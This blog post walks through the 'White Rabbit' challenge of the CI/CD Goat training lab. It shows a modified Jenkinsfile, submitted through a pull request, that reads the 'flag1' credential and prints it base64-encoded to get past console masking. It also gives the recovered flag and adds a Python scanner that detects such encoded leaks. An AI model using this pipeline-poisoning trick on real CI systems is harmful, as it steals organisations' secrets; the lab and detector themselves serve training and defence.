CI/CD Goat

n00🔑
Jan 15, 2024

In today’s fast-paced development environment, understanding and securing Continuous Integration and Continuous Delivery (CI/CD) pipelines is crucial. This blog post focuses on “CI/CD Goat,” a learning and training tool hosted on GitHub that is designed specifically for this purpose. It offers a hands-on approach to understanding common security vulnerabilities in CI/CD pipelines and strategies for mitigating them. The tool is a valuable resource for developers, security professionals, and DevOps teams aiming to strengthen their CI/CD security practices. Through practical examples and interactive exercises, “CI/CD Goat” provides a comprehensive learning experience in navigating and securing complex CI/CD environments.

Explore more about CI/CD Goat here: https://github.com/cider-security-research/cicd-goat?tab=readme-ov-file.

Installation

curl -o cicd-goat/docker-compose.yaml --create-dirs https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
cd cicd-goat && docker-compose up -d

Let’s start exploring the challenges.

White Rabbit

We already know that a secret named “flag1” is stored in the Jenkins credential store.

Therefore we can try to add code to the Jenkinsfile that reads this secret.

1. Create a new branch.

2. Modify the Jenkinsfile to read the secret “flag1”.

pipeline {
    agent any
    environment {
        PROJECT = "src/urllib3"
        // Binding the secret text 'flag1' to an environment variable
        SECRET_TEXT = credentials('flag1')
    }

    stages {
        // Added stage: prints the bound secret, base64-encoded, to the build console
        stage('Example') {
            steps {
                script {
                    sh '''
                    echo ${SECRET_TEXT} | base64
                    '''
                }
            }
        }

        stage ('Install_Requirements') {
            steps {
                sh """
                virtualenv venv
                pip3 install -r requirements.txt || true
                """
            }
        }

        stage ('Lint') {
            steps {
                sh "pylint ${PROJECT} || true"
            }
        }

        stage ('Unit Tests') {
            steps {
                sh "pytest"
            }
        }
    }

    post {
        always {
            cleanWs()
        }
    }
}

3. Push the changes to the remote repository.

4. Create a pull request.

5. The base64-encoded secret is printed in the build console; decoded, it gives the flag:

06165DF2-C047-4402-8CAB-1C8EC526C115
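Jenkins masks a bound credential only where its literal value appears in the console, which is why the base64 output above passes through untouched. As an added example (not part of the original post or of the CI/CD Goat project), here is a Python check a defender could run over archived Jenkins console logs to flag a known credential value whether it appears verbatim or inside a base64 token; the console log lines and the `****` masking line are constructed for the example.

```python
import base64
import binascii
import re

# Tokens that look like base64: 16+ chars of the standard or URL-safe alphabet, optional padding.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/_-]{16,}={0,2}")


def _decode_candidates(token):
    """Yield plausible decodings of a base64-looking token (standard and URL-safe alphabets)."""
    padded = token + "=" * (-len(token) % 4)  # tolerate stripped padding
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            yield decoder(padded)
        except (binascii.Error, ValueError):
            continue


def find_leaked_secrets(log_text, secrets):
    """Return (line_no, credential_id, encoding) for every console line exposing a known value.
    Matching is done on the *decoded* bytes, so `echo $SECRET | base64`, which also encodes
    the trailing newline, is still caught."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        for cred_id, value in secrets.items():
            raw = value.encode()
            if raw in line.encode():
                findings.append((line_no, cred_id, "plain"))
                continue
            for token in _B64_TOKEN.findall(line):
                if any(raw in decoded for decoded in _decode_candidates(token)):
                    findings.append((line_no, cred_id, "base64"))
                    break
    return findings


# Constructed sample console log for the modified 'Example' stage: the binding masks the
# secret in the echoed command line, but the base64 output is printed as-is.
FLAG1 = "06165DF2-C047-4402-8CAB-1C8EC526C115"  # value recovered in the walkthrough
ENCODED = base64.b64encode((FLAG1 + "\n").encode()).decode()  # what `echo ... | base64` prints
SAMPLE_CONSOLE_LOG = (
    "[Pipeline] { (Example)\n"
    "[Pipeline] sh\n"
    "+ echo ****\n"
    "+ base64\n"
    f"{ENCODED}\n"
    "[Pipeline] }\n"
)


def scan_sample():
    """Scan the constructed log for the 'flag1' credential."""
    return find_leaked_secrets(SAMPLE_CONSOLE_LOG, {"flag1": FLAG1})
```

In a real pipeline the same check belongs in a post-build step fed with the credential values Jenkins already knows, so that an encoded copy is flagged as loudly as a plaintext one.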

Thanks for reading!
